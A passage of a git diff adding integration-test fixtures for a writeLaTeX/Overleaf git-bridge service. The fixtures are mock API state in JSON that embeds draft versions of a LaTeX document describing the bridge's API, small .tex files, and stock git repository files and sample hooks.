(Older versions may or may not have been moved to cold storage.)\\n\\nThe srcs array contains (content, file name) pairs; the atts array contains (URL, file name) pairs.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/snapshots/39\\n# => {\\n \\\"srcs\\\":[\\n [\\\"This text is from another file.\\\",\\\"foo/bar/test.tex\\\"],\\n [\\\"\\\\\\\\documentclass[a4paper]{article}\\\\n...\\\",\\\"main.tex\\\"]],\\n \\\"atts\\\":[\\n [\\\"https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png\\\",\\\"min_mean_wait_evm_7_eps_150dpi.png\\\"]]}\\n\\\\end{lstlisting}\\n\\n\\\\section{Pushing a Project to WriteLaTeX}\\n\\n\\\\subsection{Push a Project}\\n\\n\\\\begin{lstlisting}\\n# NB: JLM originally said PUT, but he now thinks POST is better\\n# NB: you must set a Content-Type: application/json header for this request\\n# in order to specify the data as JSON in the request body\\nPOST https://.../api/v0/docs/1826rqgsdb/snapshots\\nData:\\n{\\n latestVerId: integer,\\n files: [\\n {\\n name: string path (forward slashes, relative to root)\\n url: string (but only if the file is modified; else no url given)\\n }, ...\\n ]\\n postbackUrl: url to post result back to\\n}\\nResponse on success:\\n{\\n status: 202,\\n code: \\\"accepted\\\",\\n message: \\\"Accepted\\\"\\n}\\nResponse on out of date:\\n{\\n status: 409, # Conflict\\n code: \\\"outOfDate\\\",\\n message: \\\"Out of Date\\\"\\n}\\n\\nPostback Data (METHOD POST):\\nOn success:\\n{\\n code: \\\"upToDate\\\",\\n latestVerId: integer\\n}\\nOn out of date:\\n{\\n code: \\\"outOfDate\\\",\\n message: \\\"Out of Date\\\"\\n}\\nOn error with the files list (e.g. file extension not allowed):\\n{\\n code: \\\"invalidFiles\\\",\\n errors: TODO\\n}\\nOn error with the project as a whole (e.g. over quota):\\n{\\n code: \\\"invalidProject\\\",\\n errors: TODO\\n}\\nOn unexpected error (bug):\\n{\\n code: \\\"error\\\",\\n message: \\\"Unexpected Error\\\"\\n}\\n\\\\end{lstlisting}\\n\\n\\\\section{Test Data}\\n\\nYou can use this project as one of your test projects. I've added an attachment and a file in a subfolder to make it a bit more interesting.\\n\\n\\\\input{foo/bar/test}\\n\\n\\\\includegraphics[width=\\\\linewidth]{min_mean_wait_evm_7_eps_150dpi}\\n\\n\\\\end{document}", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png", + "path": "min_mean_wait_evm_7_eps_150dpi.png" + } + ] + }, + { + "versionID": 175, + "srcs": [ + { + "content": "\\\\documentclass[a4paper]{article}\\n\\n\\\\usepackage[english]{babel}\\n\\\\usepackage[utf8]{inputenc}\\n\\\\usepackage{graphicx}\\n\\\\usepackage{fullpage}\\n\\\\usepackage{listings}\\n\\\\usepackage{courier}\\n\\\\usepackage{url}\\n\\n\\\\lstset{basicstyle=\\\\ttfamily,breaklines=true}\\n\\n\\\\begin{document}\\n\\\\title{API for the writeLaTeX-Git Bridge}\\n\\\\author{JLM}\\n\\\\date{\\\\today}\\n\\\\maketitle\\n\\n\\\\section{Fetching a Project from WriteLaTeX}\\n\\nThere are three API calls that will likely be of interest. You can run them against this server, \\\\url{radiant-wind-3058.herokuapp.com}, but they're not on the production server yet.\\n\\n\\\\subsection{Get Doc}\\n\\nA ``doc'' is our internal term for a ``project''. 
At present, this just returns the latest version number.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb\\n# => { latestVerId: 39 }\\nTODO will also include updatedAt time and user (if it was not anonymous)\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Saved Vers}\\n\\nA ``saved ver'' is a version of a doc, saved by via the versions menu. Note that this query is not currently paginated.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/saved_vers\\n# => [\\n {\\\"versionId\\\":39,\\n \\\"comment\\\":\\\"with more files\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T18:02:19Z\\\"},\\n {\\\"versionId\\\":24,\\n \\\"comment\\\":\\\"first draft\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T17:56:58Z\\\"}]\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Snapshot for Version}\\n\\nA snapshot contains the content of a project in the given version. You can safely request a snapshot of any version that is, or was at any point in the last 24 hours, (1) a saved version, or (2) the current version. (Older versions may or may not have been moved to cold storage.)\\n\\nThe srcs array contains (content, file name) pairs; the atts array contains (URL, file name) pairs.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/snapshots/39\\n# => {\\n \\\"srcs\\\":[\\n [\\\"This text is from another file.\\\",\\\"foo/bar/test.tex\\\"],\\n [\\\"\\\\\\\\documentclass[a4paper]{article}\\\\n...\\\",\\\"main.tex\\\"]],\\n \\\"atts\\\":[\\n [\\\"https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png\\\",\\\"min_mean_wait_evm_7_eps_150dpi.png\\\"]]}\\n\\\\end{lstlisting}\\n\\n\\\\section{Pushing a Project to WriteLaTeX}\\n\\n\\\\subsection{Push a Project}\\n\\n\\\\begin{lstlisting}\\n# NB: JLM originally said PUT, but he now thinks POST is better\\n# NB: you must set a Content-Type: application/json header for this request\\n# in order to specify the data as JSON in the request body\\nPOST https://.../api/v0/docs/1826rqgsdb/snapshots\\nData:\\n{\\n latestVerId: integer,\\n files: [\\n {\\n name: string path (forward slashes, relative to root)\\n url: string (but only if the file is modified; else no url given)\\n }, ...\\n ]\\n postbackUrl: url to post result back to\\n}\\nResponse on success:\\n{\\n status: 202,\\n code: \\\"accepted\\\",\\n message: \\\"Accepted\\\"\\n}\\nResponse on out of date:\\n{\\n status: 409, # Conflict\\n code: \\\"outOfDate\\\",\\n message: \\\"Out of Date\\\"\\n}\\n\\nPostback Data (METHOD POST):\\nOn success:\\n{\\n code: \\\"upToDate\\\",\\n latestVerId: integer\\n}\\nOn out of date:\\n{\\n code: \\\"outOfDate\\\",\\n message: \\\"Out of Date\\\"\\n}\\nOn error:\\n{\\n code: \\\"invalidFile\\\",\\n TODO\\n}\\n\\\\end{lstlisting}\\n\\n\\\\section{Test Data}\\n\\nYou can use this project as one of your test projects. 
I've added an attachment and a file in a subfolder to make it a bit more interesting.\\n\\n\\\\input{foo/bar/test}\\n\\n\\\\includegraphics[width=\\\\linewidth]{min_mean_wait_evm_7_eps_150dpi}\\n\\n\\\\end{document}", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png", + "path": "min_mean_wait_evm_7_eps_150dpi.png" + } + ] + }, + { + "versionID": 146, + "srcs": [ + { + "content": "\\\\documentclass[a4paper]{article}\\n\\n\\\\usepackage[english]{babel}\\n\\\\usepackage[utf8]{inputenc}\\n\\\\usepackage{graphicx}\\n\\\\usepackage{fullpage}\\n\\\\usepackage{listings}\\n\\\\usepackage{courier}\\n\\\\usepackage{url}\\n\\n\\\\lstset{basicstyle=\\\\ttfamily,breaklines=true}\\n\\n\\\\begin{document}\\n\\\\title{API for the writeLaTeX-Git Bridge}\\n\\\\author{JLM}\\n\\\\date{\\\\today}\\n\\\\maketitle\\n\\n\\\\section{Fetching a Project from WriteLaTeX}\\n\\nThere are three API calls that will likely be of interest. You can run them against this server, \\\\url{radiant-wind-3058.herokuapp.com}, but they're not on the production server yet.\\n\\n\\\\subsection{Get Doc}\\n\\nA ``doc'' is our internal term for a ``project''. At present, this just returns the latest version number.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb\\n# => { latestVerId: 39 }\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Saved Vers}\\n\\nA ``saved ver'' is a version of a doc, saved by via the versions menu. Note that this query is not currently paginated.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/saved_vers\\n# => [\\n {\\\"versionId\\\":39,\\n \\\"comment\\\":\\\"with more files\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T18:02:19Z\\\"},\\n {\\\"versionId\\\":24,\\n \\\"comment\\\":\\\"first draft\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T17:56:58Z\\\"}]\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Snapshot for Version}\\n\\nA snapshot contains the content of a project in the given version. You can safely request a snapshot of any version that is, or was at any point in the last 24 hours, (1) a saved version, or (2) the current version. 
(Older versions may or may not have been moved to cold storage.)\\n\\nThe srcs array contains (content, file name) pairs; the atts array contains (URL, file name) pairs.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/snapshots/39\\n# => {\\n \\\"srcs\\\":[\\n [\\\"This text is from another file.\\\",\\\"foo/bar/test.tex\\\"],\\n [\\\"\\\\\\\\documentclass[a4paper]{article}\\\\n...\\\",\\\"main.tex\\\"]],\\n \\\"atts\\\":[\\n [\\\"https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png\\\",\\\"min_mean_wait_evm_7_eps_150dpi.png\\\"]]}\\n\\\\end{lstlisting}\\n\\n\\\\section{Pushing a Project to WriteLaTeX}\\n\\n\\\\subsection{Push a Project}\\n\\n\\\\begin{lstlisting}\\nPUT https://.../api/v0/docs/1826rqgsdb/snapshots\\nData:\\n{\\n latestVerId: integer,\\n files: [\\n {\\n name: string path (forward slashes, relative to root)\\n url: string (but only if the file is modified; else no url given)\\n }, ...\\n ]\\n postbackUrl: url to post result back to\\n}\\nResponse on success:\\n{\\n status: 20x,\\n}\\nResponse on out of date:\\n{\\n status: 40x,\\n code: \\\"outOfDate\\\",\\n message: \\\"Out of Date\\\"\\n}\\n\\nPostback Data (METHOD POST):\\nOn success:\\n{\\n code: \\\"upToDate\\\",\\n latestVerId: integer\\n}\\nOn out of date:\\n{\\n code: \\\"outOfDate\\\",\\n message: \\\"Out of Date\\\"\\n}\\nOn error:\\n{\\n code: \\\"invalidFile\\\",\\n TODO\\n}\\n\\\\end{lstlisting}\\n\\n\\\\section{Test Data}\\n\\nYou can use this project as one of your test projects. I've added an attachment and a file in a subfolder to make it a bit more interesting.\\n\\n\\\\input{foo/bar/test}\\n\\n\\\\includegraphics[width=\\\\linewidth]{min_mean_wait_evm_7_eps_150dpi}\\n\\n\\\\end{document}", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png", + "path": "min_mean_wait_evm_7_eps_150dpi.png" + } + ] + }, + { + "versionID": 74, + "srcs": [ + { + "content": "\\\\documentclass[a4paper]{article}\\n\\n\\\\usepackage[english]{babel}\\n\\\\usepackage[utf8]{inputenc}\\n\\\\usepackage{graphicx}\\n\\\\usepackage{fullpage}\\n\\\\usepackage{listings}\\n\\\\usepackage{courier}\\n\\\\usepackage{url}\\n\\n\\\\lstset{basicstyle=\\\\ttfamily,breaklines=true}\\n\\n\\\\begin{document}\\n\\\\title{API for the writeLaTeX-Git Bridge}\\n\\\\author{JLM}\\n\\\\date{\\\\today}\\n\\\\maketitle\\n\\n\\\\section{Fetching a Project from WriteLaTeX}\\n\\nThere are three API calls that will likely be of interest. You can run them against this server, \\\\url{radiant-wind-3058.herokuapp.com}, but they're not on the production server yet.\\n\\n\\\\subsection{Get Doc}\\n\\nA ``doc'' is our internal term for a ``project''. At present, this just returns the latest version number.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb\\n# => { latestVerId: 39 }\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Saved Vers}\\n\\nA ``saved ver'' is a version of a doc, saved by via the versions menu. 
Note that this query is not currently paginated.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/saved_vers\\n# => [\\n {\\\"versionId\\\":39,\\n \\\"comment\\\":\\\"with more files\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T18:02:19Z\\\"},\\n {\\\"versionId\\\":24,\\n \\\"comment\\\":\\\"first draft\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T17:56:58Z\\\"}]\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Snapshot for Version}\\n\\nA snapshot contains the content of a project in the given version. You can safely request a snapshot of any version that is, or was at any point in the last 24 hours, (1) a saved version, or (2) the current version. (Older versions may or may not have been moved to cold storage.)\\n\\nThe srcs array contains (content, file name) pairs; the atts array contains (URL, file name) pairs.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/snapshots/39\\n# => {\\n \\\"srcs\\\":[\\n [\\\"This text is from another file.\\\",\\\"foo/bar/test.tex\\\"],\\n [\\\"\\\\\\\\documentclass[a4paper]{article}\\\\n...\\\",\\\"main.tex\\\"]],\\n \\\"atts\\\":[\\n [\\\"https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png\\\",\\\"min_mean_wait_evm_7_eps_150dpi.png\\\"]]}\\n\\\\end{lstlisting}\\n\\n\\\\section{Pushing a Project to WriteLaTeX}\\n\\nTODO still working on this part\\n\\n\\\\section{Test Data}\\n\\nYou can use this project as a test project. I've added an attachment and a file in a subfolder to make it a bit more interesting.\\n\\n\\\\input{foo/bar/test}\\n\\n\\\\includegraphics[width=\\\\linewidth]{min_mean_wait_evm_7_eps_150dpi}\\n\\n\\\\end{document}", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png", + "path": "min_mean_wait_evm_7_eps_150dpi.png" + } + ] + }, + { + "versionID": 39, + "srcs": [ + { + "content": "\\\\documentclass[a4paper]{article}\\n\\n\\\\usepackage[english]{babel}\\n\\\\usepackage[utf8]{inputenc}\\n\\\\usepackage{graphicx}\\n\\\\usepackage{fullpage}\\n\\\\usepackage{listings}\\n\\\\usepackage{courier}\\n\\\\usepackage{url}\\n\\n\\\\lstset{basicstyle=\\\\ttfamily,breaklines=true}\\n\\n\\\\begin{document}\\n\\\\title{API for the writeLaTeX-Git Bridge}\\n\\\\author{JLM}\\n\\\\date{\\\\today}\\n\\\\maketitle\\n\\n\\\\section{Fetching a Project from WriteLaTeX}\\n\\nThere are three API calls that will likely be of interest. You can run them against this server, \\\\url{radiant-wind-3058.herokuapp.com}, but they're not on the production server yet.\\n\\n\\\\subsection{Get Doc}\\n\\nA ``doc'' is our internal term for a ``project''. At present, this just returns the latest version number.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Saved Vers}\\n\\nA ``saved ver'' is a version of a doc, saved by via the versions menu. To list saved versions for a doc:\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/saved_vers\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Snapshot for Version}\\n\\nA snapshot contains the content of a project in the given version. 
You can safely request a snapshot of any version that is, or was at any point in the last 24 hours, (1) a saved version, or (2) the current version. (Older versions may or may not have been moved to cold storage.)\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/snapshots/1\\n\\\\end{lstlisting}\\n\\n\\\\section{Pushing a Project to WriteLaTeX}\\n\\nTODO still working on this part\\n\\n\\\\section{Test Data}\\n\\nYou can use this project as a test project. I've added an attachment and a file in a subfolder to make it a bit more interesting.\\n\\n\\\\input{foo/bar/test}\\n\\n\\\\includegraphics[width=\\\\linewidth]{min_mean_wait_evm_7_eps_150dpi}\\n\\n\\\\end{document}", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png", + "path": "min_mean_wait_evm_7_eps_150dpi.png" + } + ] + }, + { + "versionID": 24, + "srcs": [ + { + "content": "\\\\documentclass[a4paper]{article}\\n\\n\\\\usepackage[english]{babel}\\n\\\\usepackage[utf8]{inputenc}\\n\\\\usepackage{graphicx}\\n\\\\usepackage{fullpage}\\n\\\\usepackage{listings}\\n\\\\usepackage{courier}\\n\\\\usepackage{url}\\n\\n\\\\lstset{basicstyle=\\\\ttfamily,breaklines=true}\\n\\n\\\\begin{document}\\n\\\\title{API for the writeLaTeX-Git Bridge}\\n\\\\author{JLM}\\n\\\\date{\\\\today}\\n\\\\maketitle\\n\\n\\\\section{Fetching a Project from WriteLaTeX}\\n\\nThere are three API calls that will likely be of interest. You can run them against this server (radiant-wind-3058.herokuapp.com).\\n\\n\\\\subsection{Get Doc}\\n\\nA ``doc'' is our internal term for a ``project''. At present, this just returns the latest version number.\\n\\n\\\\begin{lstlisting}\\nGET https://radiant-wind.....com/api/v0/docs/1826rqgsdb\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Saved Vers}\\n\\nA ``saved ver'' is a version of a doc, saved by via the versions menu. To list saved versions for a doc:\\n\\n\\\\begin{lstlisting}\\nGET https://radiant-wind.....com/api/v0/docs/1826rqgsdb/saved_vers\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Snapshot for Version}\\n\\nA snapshot contains the content of a project in the given version. You can safely request a snapshot of any version that is, or was at any point in the last 24 hours, (1) a saved version, or (2) the current version. (Older versions may or may not have been moved to cold storage.)\\n\\n\\\\begin{lstlisting}\\nGET https://radiant-wind.....com/api/v0/docs/1826rqgsdb/snapshots/1\\n\\\\end{lstlisting}\\n\\n\\\\section{Pushing a Project to WriteLaTeX}\\n\\nTODO still working on this part\\n\\n\\\\section{Test Data}\\n\\nYou can use this project as a test project. 
Here is an extra file to make it a bit more interesting.\\n\\n\\\\includegraphics[width=\\\\linewidth]{min_mean_wait_evm_7_eps_150dpi}\\n\\n\\\\end{document}", + "path": "main.tex" + } + ], + "atts": [ + { + "url": "https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png", + "path": "min_mean_wait_evm_7_eps_150dpi.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 244 + } + } +] \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/111111111111111111111111/foo/bar/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/111111111111111111111111/foo/bar/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/111111111111111111111111/foo/bar/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/111111111111111111111111/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/111111111111111111111111/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/111111111111111111111111/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/111111111111111111111111/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/111111111111111111111111/overleaf-white-410.png new file mode 100644 index 0000000..6a23d10 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/111111111111111111111111/overleaf-white-410.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/222222222222222222222222/editor-versions-a7e4de19d015c3e7477e3f7eaa6c418e.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/222222222222222222222222/editor-versions-a7e4de19d015c3e7477e3f7eaa6c418e.png new file mode 100644 index 0000000..7fa339b Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/222222222222222222222222/editor-versions-a7e4de19d015c3e7477e3f7eaa6c418e.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/222222222222222222222222/foo/bar/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/222222222222222222222222/foo/bar/test.tex new file mode 100644 index 0000000..1c05c01 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/222222222222222222222222/foo/bar/test.tex @@ -0,0 +1 @@ +a different one \ No newline at end of file diff --git 
a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/222222222222222222222222/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/222222222222222222222222/main.tex new file mode 100644 index 0000000..802d4bb --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/222222222222222222222222/main.tex @@ -0,0 +1 @@ +different content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/state.json new file mode 100644 index 0000000..6c47055 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/wlgbCanSwapProjects/state/state.json @@ -0,0 +1,90 @@ +[ + { + "project": "111111111111111111111111", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3874/state/111111111111111111111111/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + }, + { + "project": "222222222222222222222222", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "different content\n", + "path": "main.tex" + }, + { + "content": "a different one", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3874/state/222222222222222222222222/editor-versions-a7e4de19d015c3e7477e3f7eaa6c418e.png", + "path": "editor-versions-a7e4de19d015c3e7477e3f7eaa6c418e.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/.wlgb/wlgb.db b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/.wlgb/wlgb.db new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/idontexist/idontexist.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/idontexist/idontexist.txt new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/COMMIT_EDITMSG 
b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/COMMIT_EDITMSG new file mode 100644 index 0000000..c098216 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/COMMIT_EDITMSG @@ -0,0 +1 @@ +Main diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/HEAD b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/HEAD new file mode 100644 index 0000000..cb089cd --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/HEAD @@ -0,0 +1 @@ +ref: refs/heads/master diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/config b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/config new file mode 100644 index 0000000..6c9406b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/config @@ -0,0 +1,7 @@ +[core] + repositoryformatversion = 0 + filemode = true + bare = false + logallrefupdates = true + ignorecase = true + precomposeunicode = true diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/description b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/description new file mode 100644 index 0000000..498b267 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/description @@ -0,0 +1 @@ +Unnamed repository; edit this file 'description' to name the repository. diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/applypatch-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/applypatch-msg.sample new file mode 100755 index 0000000..a5d7b84 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/applypatch-msg.sample @@ -0,0 +1,15 @@ +#!/bin/sh +# +# An example hook script to check the commit log message taken by +# applypatch from an e-mail message. +# +# The hook should exit with non-zero status after issuing an +# appropriate message if it wants to stop the commit. The hook is +# allowed to edit the commit message file. +# +# To enable this hook, rename this file to "applypatch-msg". + +. git-sh-setup +commitmsg="$(git rev-parse --git-path hooks/commit-msg)" +test -x "$commitmsg" && exec "$commitmsg" ${1+"$@"} +: diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/commit-msg.sample 